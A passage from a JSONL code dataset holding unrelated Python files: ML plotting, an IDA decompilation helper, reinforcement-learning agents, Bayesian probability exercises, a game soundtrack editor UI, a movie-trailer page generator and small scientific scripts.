vertices]\n polygon = Polygon(poly, True) \n patches = []\n patches.append(polygon)\n\n p = PatchCollection(patches, alpha=0.2,color = self.colors[i])\n ax.add_collection(p)\n \n if region == 2 or region == 'all':\n for i in range(0,num_classes): \n class_inds = np.arange(num_classes)\n class_inds = np.delete(class_inds,(i),axis = 0)\n\n # loop over non-current classifier\n ind = np.argwhere(y[class_inds[0]] > 0).tolist()\n ind = [s[0] for s in ind]\n for j in range(1,len(class_inds)):\n c_ind = class_inds[j]\n ind2 = np.argwhere(y[c_ind] > 0).tolist()\n ind2 = [s[0] for s in ind2]\n ind = [s for s in ind if s in ind2] \n\n ind2 = np.argwhere(y[i] < 0).tolist()\n ind2 = [s[0] for s in ind2]\n ind = [s for s in ind if s in ind2]\n\n # plot polygon over region defined by ind\n x1_ins = np.asarray([x1_vals[s] for s in ind])\n x1_ins.shape = (len(x1_ins),1)\n x2_ins = np.asarray([x2_vals[s] for s in ind])\n x2_ins.shape = (len(x2_ins),1)\n o = np.ones((len(x2_ins),1))\n h = np.concatenate((o,x1_ins,x2_ins),axis = 1)\n \n # determine regions dominated by one classifier or the other\n vals = []\n for c in class_inds:\n w = self.W[int(c)]\n nv = np.dot(w,h.T)\n vals.append(nv)\n vals = np.asarray(vals)\n vals.shape = (len(class_inds),len(h))\n ind = np.argmax(vals,axis = 0)\n\n for j in range(len(class_inds)):\n # make polygon for each subregion\n ind1 = np.argwhere(ind == j)\n x1_ins2 = np.asarray([x1_ins[s] for s in ind1])\n x1_ins2.shape = (len(x1_ins2),1)\n x2_ins2 = np.asarray([x2_ins[s] for s in ind1])\n x2_ins2.shape = (len(x2_ins2),1)\n h = np.concatenate((x1_ins2,x2_ins2),axis = 1)\n \n # find convex hull of points\n vertices = ConvexHull(h).vertices\n poly = [h[v] for v in vertices]\n polygon = Polygon(poly, True) \n patches = []\n patches.append(polygon)\n c = class_inds[j]\n p = PatchCollection(patches, alpha=0.2,color = self.colors[c])\n ax.add_collection(p)\n \n if region == 3 or region == 'all':\n # find negative zone of all classifiers\n ind = np.argwhere(y[0] < 0).tolist()\n ind = [s[0] for s in ind]\n for i in range(1,num_classes):\n ind2 = np.argwhere(y[i] < 0).tolist()\n ind2 = [s[0] for s in ind2]\n ind = [s for s in ind if s in ind2] \n\n # loop over negative zone, find max area of each classifier\n x1_ins = np.asarray([x1_vals[s] for s in ind])\n x1_ins.shape = (len(x1_ins),1)\n x2_ins = np.asarray([x2_vals[s] for s in ind])\n x2_ins.shape = (len(x2_ins),1)\n o = np.ones((len(x2_ins),1))\n h = np.concatenate((o,x1_ins,x2_ins),axis = 1)\n \n # determine regions dominated by one classifier or the other\n vals = []\n for c in range(num_classes):\n w = self.W[c]\n nv = np.dot(w,h.T)\n vals.append(nv)\n vals = np.asarray(vals)\n vals.shape = (num_classes,len(h))\n ind = np.argmax(vals,axis = 0)\n\n # loop over each class, construct polygon region for each\n for c in range(num_classes):\n # make polygon for each subregion\n ind1 = np.argwhere(ind == c)\n x1_ins2 = np.asarray([x1_ins[s] for s in ind1])\n x1_ins2.shape = (len(x1_ins2),1)\n x2_ins2 = np.asarray([x2_ins[s] for s in ind1])\n x2_ins2.shape = (len(x2_ins2),1)\n h = np.concatenate((x1_ins2,x2_ins2),axis = 1)\n \n # find convex hull of points\n vertices = ConvexHull(h).vertices\n poly = [h[v] for v in vertices]\n polygon = Polygon(poly, True) \n patches = []\n patches.append(polygon)\n p = PatchCollection(patches, alpha=0.2,color = self.colors[c])\n ax.add_collection(p) \n \n \n # plot data\n def plot_data(self,ax):\n # initialize figure, plot data, and dress up panels with axes labels etc.\n num_classes = np.size(np.unique(self.y))\n \n # color current class\n for a in range(0,num_classes):\n t = np.argwhere(self.y == a)\n t = t[:,0]\n ax.scatter(self.x[t,0],self.x[t,1], s = 50,color = self.colors[a],edgecolor = 'k',linewidth = 1.5)\n \n # plot separators\n def plot_all_separators(self,ax):\n # determine plotting ranges\n minx = min(min(self.x[:,0]),min(self.x[:,1]))\n maxx = max(max(self.x[:,0]),max(self.x[:,1]))\n gapx = (maxx - minx)*0.1\n minx -= gapx\n maxx += gapx\n \n # initialize figure, plot data, and dress up panels with axes labels etc.\n num_classes = np.size(np.unique(self.y))\n \n # color current class\n r = np.linspace(minx,maxx,400)\n for a in range(0,num_classes):\n # get current weights\n w = self.W[a]\n \n # draw subproblem separator\n z = - w[0]/w[2] - w[1]/w[2]*r\n r = np.linspace(minx,maxx,400)\n ax.plot(r,z,linewidth = 2,color = self.colors[a],zorder = 3)\n ax.plot(r,z,linewidth = 2.75,color = 'k',zorder = 2)","sub_path":"mlrefined_libraries/superlearn_library/ova_illustrator.py","file_name":"ova_illustrator.py","file_ext":"py","file_size_in_byte":22409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"548896248","text":"# -*- coding: utf-8 -*-\nimport sys\n\nimport rpyc\n\nimport idautils\nfrom idc import *\nimport idaapi\nimport ida_struct\nimport idc\nimport ida_nalt\nimport ida_hexrays\n\n# reference https://github.com/zardus/idalink\n# decomplie 所有变量类型\nfuncs = idautils.Functions()\nea = idaapi.get_screen_ea()\nf = idaapi.get_func(ea)\nfunction_name = idaapi.get_func_name(ea)\ncfunc = None\ntry:\n cfunc = idaapi.decompile(f)\nexcept ida_hexrays.DecompilationFailure as e:\n print('Failed to decompile %x: %s!' % (ea, function_name))\n raise e\ntid_t = ida_struct.add_struc(1, \"hashentry\")\nstruct_id = ida_struct.get_struc_id(\"hashentry\")\nmy_struct = ida_struct.get_struc(struct_id)\nlvars = cfunc.get_lvars()\nvu = idaapi.get_widget_vdui(idaapi.find_widget(\"Pseudocode-A\"))\nfor lvar in lvars:\n if str(lvar.name) == 'j':\n tif = ida_typeinf.tinfo_t()\n ida_typeinf.parse_decl(tif, None, \"struct hashentry;\", 0)\n # tif.get_type\n vu.set_lvar_type(lvar, tif)\n print(str(lvar.name)+\"--->\"+str(lvar.type()))\n else:\n print(str(lvar.name) + \"--->\" + str(lvar.type()))\n\nvu.refresh_ctext()\ncfunc = None\ntry:\n cfunc = idaapi.decompile(f)\nexcept ida_hexrays.DecompilationFailure as e:\n print('Failed to decompile %x: %s!' % (ea, function_name))\n raise e\nconn = rpyc.classic.connect(\"localhost\",port=18861)\nrsys = conn.modules.sys\nprint(cfunc, file=conn.modules.sys.stdout)","sub_path":"dataset-gen/rpycstudy/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"392457264","text":"import torch\nimport numpy as np\nfrom parl.core.torch.agent import Agent\n\n\nclass Student_Agent(Agent):\n\n def __init__(self, algorithm):\n super(Student_Agent, self).__init__(algorithm)\n self.device = torch.device(\"cuda\" if torch.cuda.\n is_available() else \"cpu\")\n\n def sample(self, obs):\n obs = torch.tensor(obs, device=self.device, dtype=torch.float)\n prob = self.alg.predict(obs).cpu()\n prob = prob.data.numpy()\n action = np.random.choice(len(prob), 1, p=prob)[0]\n return action\n\n def predict(self, obs):\n obs = torch.tensor(obs, device=self.device, dtype=torch.float)\n prob = self.alg.predict(obs)\n _, action = prob.max(-1)\n return action.item()\n\n def learn(self, obs, action, reward, alpha):\n obs = torch.tensor(obs, device=self.device, dtype=torch.float)\n action = torch.tensor(action, device=self.device, dtype=torch.long)\n reward = torch.tensor(reward, device=self.device, dtype=torch.float)\n\n loss = self.alg.learn(obs, action, reward, alpha)\n return loss.item()\n","sub_path":"CartPole/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"355637210","text":"from thinkbayes import Pmf, Suite\n\n\ndef get_prob_cookie_problem(bowl):\n pmf = Pmf()\n \n # Probability for selection one of bowls\n pmf.Set('Bowl1', 0.5)\n pmf.Set('Bowl2', 0.5)\n\n # Probability of selection one vanilla cookie from each cup\n pmf.Mult('Bowl1', 0.75)\n pmf.Mult('Bowl2', 0.5)\n pmf.Normalize()\n\n return pmf.Prob(bowl)\n \nprint(get_prob_cookie_problem('Bowl1'))\n\nclass Cookie(Pmf):\n\n mixes = {\n 'Bowl 1':dict(vanilla=0.75, chocolate=0.25),\n 'Bowl 2':dict(vanilla=0.5, chocolate=0.5),\n }\n\n def __init__(self, hypos):\n Pmf.__init__(self)\n for hypo in hypos:\n self.Set(hypo, 1)\n self.Normalize()\n\n def Update(self, data):\n for hypo in self.Values():\n like = self.Likelihood(data, hypo)\n self.Mult(hypo, like)\n self.Normalize()\n\n def Likelihood(self, data, hypo):\n mix = self.mixes[hypo]\n like = mix[data]\n return like\n\ndef solve_cookit_prob_with_class():\n pmf = Cookie(['Bowl 1', 'Bowl 2'])\n pmf.Update('vanilla')\n for hypo, prob in pmf.Items():\n print(hypo, prob)\n\nsolve_cookit_prob_with_class()\n\nprint('#'*40)\nprint('Monty Hall Problem')\n\nclass MontyHall(Suite):\n\n def __init__(self, hypos):\n Pmf.__init__(self)\n for hypo in hypos:\n self.Set(hypo, 1)\n self.Normalize()\n \n def Update(self, data):\n for hypo in self.Values():\n like = self.Likelihood(data, hypo)\n self.Mult(hypo, like)\n self.Normalize()\n \n def Likelihood(self, data, hypo):\n if hypo == data:\n return 0\n elif hypo == 'A':\n return 0.5\n else:\n return 1\n\n\ndef solve_monty_hall_problem_with_class():\n hypos = 'ABC'\n pmf = MontyHall(hypos)\n pmf.Update('B')\n pmf.Print()\n\nsolve_monty_hall_problem_with_class()\n\nprint('#'*40)\nprint('M&M Problem')\n\nclass MM(Suite):\n\n mix94 = dict(\n brown=30,\n yellow=20,\n red=20,\n green=10,\n orange=10,\n tan=10\n )\n mix96 = dict(\n blue=24,\n green=20,\n orange=16,\n yellow=14,\n red=13,\n brown=13\n )\n\n hypoA = dict(bag1=mix94, bag2=mix96)\n hypoB = dict(bag1=mix96, bag2=mix94)\n\n hypotheses = dict(A=hypoA, B=hypoB)\n\n def __init__(self, hypos):\n Pmf.__init__(self)\n for hypo in hypos:\n self.Set(hypo, 1)\n self.Normalize()\n\n def Likelihood(self, data, hypo):\n bag, color = data\n mix = self.hypotheses[hypo][bag]\n likelihood = mix[color]\n return likelihood\n\ndef solve_mm_problem():\n suite = MM('AB')\n suite.Update(('bag1', 'yellow'))\n suite.Print()\n\nsolve_mm_problem()\n","sub_path":"ch2_computational_statistics.py","file_name":"ch2_computational_statistics.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"249618666","text":"# Copyright (c) 2011-2020 Eric Froemling\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n# -----------------------------------------------------------------------------\n\"\"\"Provides UI for editing a soundtrack.\"\"\"\n\nfrom __future__ import annotations\n\nimport copy\nimport os\nfrom typing import TYPE_CHECKING, cast\n\nimport ba\n\nif TYPE_CHECKING:\n from typing import Any, Dict, Union, Optional\n\n\nclass SoundtrackEditWindow(ba.Window):\n \"\"\"Window for editing a soundtrack.\"\"\"\n\n def __init__(self,\n existing_soundtrack: Optional[Union[str, Dict[str, Any]]],\n transition: str = 'in_right'):\n # pylint: disable=too-many-statements\n appconfig = ba.app.config\n self._r = 'editSoundtrackWindow'\n self._folder_tex = ba.gettexture('folder')\n self._file_tex = ba.gettexture('file')\n self._width = 848 if ba.app.small_ui else 648\n x_inset = 100 if ba.app.small_ui else 0\n self._height = (395\n if ba.app.small_ui else 450 if ba.app.med_ui else 560)\n super().__init__(root_widget=ba.containerwidget(\n size=(self._width, self._height),\n transition=transition,\n scale=(2.08 if ba.app.small_ui else 1.5 if ba.app.med_ui else 1.0),\n stack_offset=(0, -48) if ba.app.small_ui else (\n 0, 15) if ba.app.med_ui else (0, 0)))\n cancel_button = ba.buttonwidget(parent=self._root_widget,\n position=(38 + x_inset,\n self._height - 60),\n size=(160, 60),\n autoselect=True,\n label=ba.Lstr(resource='cancelText'),\n scale=0.8)\n save_button = ba.buttonwidget(parent=self._root_widget,\n position=(self._width - (168 + x_inset),\n self._height - 60),\n autoselect=True,\n size=(160, 60),\n label=ba.Lstr(resource='saveText'),\n scale=0.8)\n ba.widget(edit=save_button, left_widget=cancel_button)\n ba.widget(edit=cancel_button, right_widget=save_button)\n ba.textwidget(\n parent=self._root_widget,\n position=(0, self._height - 50),\n size=(self._width, 25),\n text=ba.Lstr(resource=self._r +\n ('.editSoundtrackText' if existing_soundtrack\n is not None else '.newSoundtrackText')),\n color=ba.app.title_color,\n h_align='center',\n v_align='center',\n maxwidth=280)\n v = self._height - 110\n if 'Soundtracks' not in appconfig:\n appconfig['Soundtracks'] = {}\n\n self._soundtrack_name: Optional[str]\n self._existing_soundtrack_name: Optional[str]\n if existing_soundtrack is not None:\n # if they passed just a name, pull info from that soundtrack\n if isinstance(existing_soundtrack, str):\n self._soundtrack = copy.deepcopy(\n appconfig['Soundtracks'][existing_soundtrack])\n self._soundtrack_name = existing_soundtrack\n self._existing_soundtrack_name = existing_soundtrack\n self._last_edited_song_type = None\n else:\n # otherwise they can pass info on an in-progress edit\n self._soundtrack = existing_soundtrack['soundtrack']\n self._soundtrack_name = existing_soundtrack['name']\n self._existing_soundtrack_name = (\n existing_soundtrack['existing_name'])\n self._last_edited_song_type = (\n existing_soundtrack['last_edited_song_type'])\n else:\n self._soundtrack_name = None\n self._existing_soundtrack_name = None\n self._soundtrack = {}\n self._last_edited_song_type = None\n\n ba.textwidget(parent=self._root_widget,\n text=ba.Lstr(resource=self._r + '.nameText'),\n maxwidth=80,\n scale=0.8,\n position=(105 + x_inset, v + 19),\n color=(0.8, 0.8, 0.8, 0.5),\n size=(0, 0),\n h_align='right',\n v_align='center')\n\n # if there's no initial value, find a good initial unused name\n if existing_soundtrack is None:\n i = 1\n st_name_text = ba.Lstr(resource=self._r +\n '.newSoundtrackNameText').evaluate()\n if '${COUNT}' not in st_name_text:\n # make sure we insert number *somewhere*\n st_name_text = st_name_text + ' ${COUNT}'\n while True:\n self._soundtrack_name = st_name_text.replace(\n '${COUNT}', str(i))\n if self._soundtrack_name not in appconfig['Soundtracks']:\n break\n i += 1\n\n self._text_field = ba.textwidget(\n parent=self._root_widget,\n position=(120 + x_inset, v - 5),\n size=(self._width - (160 + 2 * x_inset), 43),\n text=self._soundtrack_name,\n h_align='left',\n v_align='center',\n max_chars=32,\n autoselect=True,\n description=ba.Lstr(resource=self._r + '.nameText'),\n editable=True,\n padding=4,\n on_return_press_call=self._do_it_with_sound)\n\n scroll_height = self._height - 180\n self._scrollwidget = scrollwidget = ba.scrollwidget(\n parent=self._root_widget,\n highlight=False,\n position=(40 + x_inset, v - (scroll_height + 10)),\n size=(self._width - (80 + 2 * x_inset), scroll_height),\n simple_culling_v=10)\n ba.widget(edit=self._text_field, down_widget=self._scrollwidget)\n self._col = ba.columnwidget(parent=scrollwidget)\n\n ba.containerwidget(edit=self._scrollwidget,\n claims_left_right=True,\n claims_tab=True,\n selection_loop_to_parent=True)\n ba.containerwidget(edit=self._col,\n claims_left_right=True,\n claims_tab=True,\n selection_loop_to_parent=True)\n\n self._song_type_buttons: Dict[str, ba.Widget] = {}\n self._refresh()\n ba.buttonwidget(edit=cancel_button, on_activate_call=self._cancel)\n ba.containerwidget(edit=self._root_widget, cancel_button=cancel_button)\n ba.buttonwidget(edit=save_button, on_activate_call=self._do_it)\n ba.containerwidget(edit=self._root_widget, start_button=save_button)\n ba.widget(edit=self._text_field, up_widget=cancel_button)\n ba.widget(edit=cancel_button, down_widget=self._text_field)\n\n def _refresh(self) -> None:\n from ba.deprecated import get_resource\n for widget in self._col.get_children():\n widget.delete()\n\n types = [\n 'Menu',\n 'CharSelect',\n 'ToTheDeath',\n 'Onslaught',\n 'Keep Away',\n 'Race',\n 'Epic Race',\n 'ForwardMarch',\n 'FlagCatcher',\n 'Survival',\n 'Epic',\n 'Hockey',\n 'Football',\n 'Flying',\n 'Scary',\n 'Marching',\n 'GrandRomp',\n 'Chosen One',\n 'Scores',\n 'Victory',\n ]\n # FIXME: We should probably convert this to use translations.\n type_names_translated = get_resource('soundtrackTypeNames')\n prev_type_button: Optional[ba.Widget] = None\n prev_test_button: Optional[ba.Widget] = None\n\n for index, song_type in enumerate(types):\n row = ba.rowwidget(parent=self._col, size=(self._width - 40, 40))\n ba.containerwidget(edit=row,\n claims_left_right=True,\n claims_tab=True,\n selection_loop_to_parent=True)\n type_name = type_names_translated.get(song_type, song_type)\n ba.textwidget(parent=row,\n size=(230, 25),\n always_highlight=True,\n text=type_name,\n scale=0.7,\n h_align='left',\n v_align='center',\n maxwidth=190)\n\n if song_type in self._soundtrack:\n entry = self._soundtrack[song_type]\n else:\n entry = None\n\n if entry is not None:\n # make sure they don't muck with this after it gets to us\n entry = copy.deepcopy(entry)\n\n icon_type = self._get_entry_button_display_icon_type(entry)\n self._song_type_buttons[song_type] = btn = ba.buttonwidget(\n parent=row,\n size=(230, 32),\n label=self._get_entry_button_display_name(entry),\n text_scale=0.6,\n on_activate_call=ba.Call(self._get_entry, song_type, entry,\n type_name),\n icon=(self._file_tex if icon_type == 'file' else\n self._folder_tex if icon_type == 'folder' else None),\n icon_color=(1.1, 0.8, 0.2) if icon_type == 'folder' else\n (1, 1, 1),\n left_widget=self._text_field,\n iconscale=0.7,\n autoselect=True,\n up_widget=prev_type_button)\n if index == 0:\n ba.widget(edit=btn, up_widget=self._text_field)\n ba.widget(edit=btn, down_widget=btn)\n\n if (self._last_edited_song_type is not None\n and song_type == self._last_edited_song_type):\n ba.containerwidget(edit=row,\n selected_child=btn,\n visible_child=btn)\n ba.containerwidget(edit=self._col,\n selected_child=row,\n visible_child=row)\n ba.containerwidget(edit=self._scrollwidget,\n selected_child=self._col,\n visible_child=self._col)\n ba.containerwidget(edit=self._root_widget,\n selected_child=self._scrollwidget,\n visible_child=self._scrollwidget)\n\n if prev_type_button is not None:\n ba.widget(edit=prev_type_button, down_widget=btn)\n prev_type_button = btn\n ba.textwidget(parent=row, size=(10, 32), text='') # spacing\n btn = ba.buttonwidget(\n parent=row,\n size=(50, 32),\n label=ba.Lstr(resource=self._r + '.testText'),\n text_scale=0.6,\n on_activate_call=ba.Call(self._test, ba.MusicType(song_type)),\n up_widget=prev_test_button\n if prev_test_button is not None else self._text_field)\n if prev_test_button is not None:\n ba.widget(edit=prev_test_button, down_widget=btn)\n ba.widget(edit=btn, down_widget=btn, right_widget=btn)\n prev_test_button = btn\n\n @classmethod\n def _restore_editor(cls, state: Dict[str, Any], musictype: str,\n entry: Any) -> None:\n music = ba.app.music\n\n # Apply the change and recreate the window.\n soundtrack = state['soundtrack']\n existing_entry = (None if musictype not in soundtrack else\n soundtrack[musictype])\n if existing_entry != entry:\n ba.playsound(ba.getsound('gunCocking'))\n\n # Make sure this doesn't get mucked with after we get it.\n if entry is not None:\n entry = copy.deepcopy(entry)\n\n entry_type = music.get_soundtrack_entry_type(entry)\n if entry_type == 'default':\n # For 'default' entries simply exclude them from the list.\n if musictype in soundtrack:\n del soundtrack[musictype]\n else:\n soundtrack[musictype] = entry\n\n ba.app.main_menu_window = (cls(state,\n transition='in_left').get_root_widget())\n\n def _get_entry(self, song_type: str, entry: Any,\n selection_target_name: str) -> None:\n music = ba.app.music\n if selection_target_name != '':\n selection_target_name = \"'\" + selection_target_name + \"'\"\n state = {\n 'name': self._soundtrack_name,\n 'existing_name': self._existing_soundtrack_name,\n 'soundtrack': self._soundtrack,\n 'last_edited_song_type': song_type\n }\n ba.containerwidget(edit=self._root_widget, transition='out_left')\n ba.app.main_menu_window = (music.get_music_player().select_entry(\n ba.Call(self._restore_editor, state, song_type), entry,\n selection_target_name).get_root_widget())\n\n def _test(self, song_type: ba.MusicType) -> None:\n music = ba.app.music\n\n # Warn if volume is zero.\n if ba.app.config.resolve('Music Volume') < 0.01:\n ba.playsound(ba.getsound('error'))\n ba.screenmessage(ba.Lstr(resource=self._r +\n '.musicVolumeZeroWarning'),\n color=(1, 0.5, 0))\n music.set_music_play_mode(ba.MusicPlayMode.TEST)\n music.do_play_music(song_type,\n mode=ba.MusicPlayMode.TEST,\n testsoundtrack=self._soundtrack)\n\n def _get_entry_button_display_name(self,\n entry: Any) -> Union[str, ba.Lstr]:\n music = ba.app.music\n etype = music.get_soundtrack_entry_type(entry)\n ename: Union[str, ba.Lstr]\n if etype == 'default':\n ename = ba.Lstr(resource=self._r + '.defaultGameMusicText')\n elif etype in ('musicFile', 'musicFolder'):\n ename = os.path.basename(music.get_soundtrack_entry_name(entry))\n else:\n ename = music.get_soundtrack_entry_name(entry)\n return ename\n\n def _get_entry_button_display_icon_type(self, entry: Any) -> Optional[str]:\n music = ba.app.music\n etype = music.get_soundtrack_entry_type(entry)\n if etype == 'musicFile':\n return 'file'\n if etype == 'musicFolder':\n return 'folder'\n return None\n\n def _cancel(self) -> None:\n from bastd.ui.soundtrack import browser as stb\n music = ba.app.music\n\n # Resets music back to normal.\n music.set_music_play_mode(ba.MusicPlayMode.REGULAR)\n ba.containerwidget(edit=self._root_widget, transition='out_right')\n ba.app.main_menu_window = (stb.SoundtrackBrowserWindow(\n transition='in_left').get_root_widget())\n\n def _do_it(self) -> None:\n from bastd.ui.soundtrack import browser as stb\n music = ba.app.music\n cfg = ba.app.config\n new_name = cast(str, ba.textwidget(query=self._text_field))\n if (new_name != self._soundtrack_name\n and new_name in cfg['Soundtracks']):\n ba.screenmessage(\n ba.Lstr(resource=self._r + '.cantSaveAlreadyExistsText'))\n ba.playsound(ba.getsound('error'))\n return\n if not new_name:\n ba.playsound(ba.getsound('error'))\n return\n if new_name == ba.Lstr(resource=self._r +\n '.defaultSoundtrackNameText').evaluate():\n ba.screenmessage(\n ba.Lstr(resource=self._r + '.cantOverwriteDefaultText'))\n ba.playsound(ba.getsound('error'))\n return\n\n # Make sure config exists.\n if 'Soundtracks' not in cfg:\n cfg['Soundtracks'] = {}\n\n # If we had an old one, delete it.\n if (self._existing_soundtrack_name is not None\n and self._existing_soundtrack_name in cfg['Soundtracks']):\n del cfg['Soundtracks'][self._existing_soundtrack_name]\n cfg['Soundtracks'][new_name] = self._soundtrack\n cfg['Soundtrack'] = new_name\n\n cfg.commit()\n ba.playsound(ba.getsound('gunCocking'))\n ba.containerwidget(edit=self._root_widget, transition='out_right')\n\n # Resets music back to normal.\n music.set_music_play_mode(ba.MusicPlayMode.REGULAR, force_restart=True)\n\n ba.app.main_menu_window = (stb.SoundtrackBrowserWindow(\n transition='in_left').get_root_widget())\n\n def _do_it_with_sound(self) -> None:\n ba.playsound(ba.getsound('swish'))\n self._do_it()\n","sub_path":"assets/src/ba_data/python/bastd/ui/soundtrack/edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":18137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"131811198","text":"from cx_Freeze import setup, Executable\n\nbuildOptions = dict(include_files = ['data/'])\n\nsetup(\n name = \"Beyond the game\",\n version = \"0.0.1\",\n description = '',\n options = dict(build_exe = buildOptions),\n executables = [Executable(\"main.py\")]\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"43047574","text":"import sys\nsys.path.append('../_tvblibrary/')\nsys.path.append('../_tvbdata/')\nfrom tvb.simulator.lab import *\n\ndef initintegrator(heun_ts, noise_cov, noiseon=True):\n ####################### 3. Integrator for Models ##########################\n # define cov noise for the stochastic heun integrato\n hiss = noise.Additive(nsig=noise_cov)\n\n if noiseon:\n heunint = integrators.HeunStochastic(dt=heun_ts, noise=hiss)\n else:\n heunint = integrators.HeunDeterministic(dt=heun_ts)\n\n return heunint","sub_path":"hackcambridge/forwardsim/tvbsim/initializers/integrators.py","file_name":"integrators.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"49807625","text":"import media\r\nimport fresh_tomatoes\r\nimport urllib\r\nimport json\r\n\r\n\r\ndef get_info(movie_name):\r\n # Get a response after opening the URL\r\n response = urllib.urlopen(\"http://www.omdbapi.com/?t=\"+movie_name+\r\n \"&y=&plot=short&r=json\")\r\n # Data from the website in the form of JSON is recieved\r\n output = response.read()\r\n # Parsing Values from JSON data\r\n wjdata = json.loads(output)\r\n return wjdata\r\n\r\n# get_info method takes the Movie name as the argument\r\n# and stores the returned data in info variable\r\ninfo = get_info(\"Batman v Superman: Dawn of Justice\")\r\n# Constructor of Movie Class takes title, description, image URL\r\n# and YouTube Link of the trailer as argument\r\nbat_vs_sup = media.Movie(info['Title'], info['Plot'], info['Poster'],\r\n \"https://www.youtube.com/watch?v=fis-9Zqu2Ro\")\r\n\r\ninfo = get_info(\"Ice Age: Collision Course\")\r\ntarzan = media.Movie(info['Title'], info['Plot'], info['Poster'],\r\n \"https://www.youtube.com/watch?v=Aj7ty6sViiU\")\r\n\r\ninfo = get_info(\"Captain America: Civil War\")\r\ncapt_america = media.Movie(info['Title'], info['Plot'], info['Poster'],\r\n \"https://www.youtube.com/watch?v=dKrVegVI0Us\")\r\n\r\ninfo = get_info(\"Suicide Squad\")\r\nsuicide = media.Movie(info['Title'], info['Plot'], info['Poster'],\r\n \"https://www.youtube.com/watch?v=CmRih_VtVA\")\r\n\r\ninfo = get_info(\"Doctor Strange\")\r\ndoc_strange = media.Movie(info['Title'], info['Plot'], info['Poster'],\r\n \"https://www.youtube.com/watch?v=HSzx-zryEgM\")\r\n\r\ninfo = get_info(\"Deadpool\")\r\ndeadpool = media.Movie(info['Title'], info['Plot'], info['Poster'],\r\n \"https://www.youtube.com/watch?v=gtTfd6tISfw\")\r\n\r\n# Array of Movie objects\r\nmovies = [bat_vs_sup, tarzan, capt_america, suicide, doc_strange, deadpool]\r\n# movies array is passed to open_movies_page function to load\r\n# the webpage with the information provided\r\nfresh_tomatoes.open_movies_page(movies)\r\n","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"571817257","text":"import gym\nimport signal\nimport sys\nimport os\nimport numpy as np\n\nfrom baselines import deepq\n\nimport argparse\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-fn\", \"--filename\", type=str, default = \"FPcav_model.pkl\",\n help=\"Deep Q Learning model file\")\nargs = parser.parse_args()\n\n\n\n#### this catches the Ctrl-C\ndef signal_handler(signal, frame):\n print('...user interrupt detected...')\n sys.exit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\n###\n\n\ndef main():\n env = gym.make(\"simplePendulum-v1\")\n funame = args.filename\n act = deepq.load(funame)\n otim = os.stat(funame).st_mtime\n\n while True:\n mtim = os.stat(funame).st_mtime\n if mtim != otim:\n #act = None\n \n #act = deepq.load(funame)\n print(\"Loaded new controller...\")\n obs, done = env.reset(), False\n episode_rew = 0\n nsteps = 0\n while nsteps < 500:\n env.render()\n obs, rew, done, _ = env.step(act(obs[None])[0])\n episode_rew += rew\n nsteps += 1\n print(\"Episode reward = \", round(episode_rew,2))\n #print(\"Angle = {0:2.2f} deg, Vel = {1:2.2f} deg/s, Torque = {2:2.2f} N/m\".format(180/np.pi*(obs[0]), 180/np.pi*obs[1], obs[2]))\n print(\"Angle = {0:2.2f} deg, Vel = {1:2.2f} deg/s\".format(\n 180/np.pi*np.arccos(obs[0]), 180/np.pi*obs[2]))\n print(\" \")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"baselines/deepq/experiments/enjoyFP.py","file_name":"enjoyFP.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"484605819","text":"import numpy as np\nimport pandas as pd\nimport os\n\ndef validate_fluxes(fileName, baseDir):\n\tdata = pd.read_csv(os.path.join(baseDir, fileName))\n\tcol = list(data.columns)[-3]\n\n\tX = sorted(list(set([ round(x,5) for x in data[\"X1\"] ])))\n\tx1_in, x1_out = X[0], X[-2]\n\tx2_in, x2_out = X[1], X[-1]\n\n\tdelta = (x2_in-x1_in)/4\n\n\ts1 = sum( [ qx*(x2_in/2) for qx, x1, x2 in zip(data[ col ], data[\"X1\"], data[\"X2\"]) if abs(x1-x1_in) 0.5:\n ## saving 200 of each class\n cnt += 1\n #if label_number[np.argmax(pred)] < 200:\n # label_number[np.argmax(pred)] += 1\n \n #else:\n # print(pred_label, 'not saving')\n # continue\n\n\n\n ### test if the folder exists\n if not pred_label in os.listdir(save_path):\n os.mkdir(save_path + pred_label)\n cv2.imwrite(save_path + 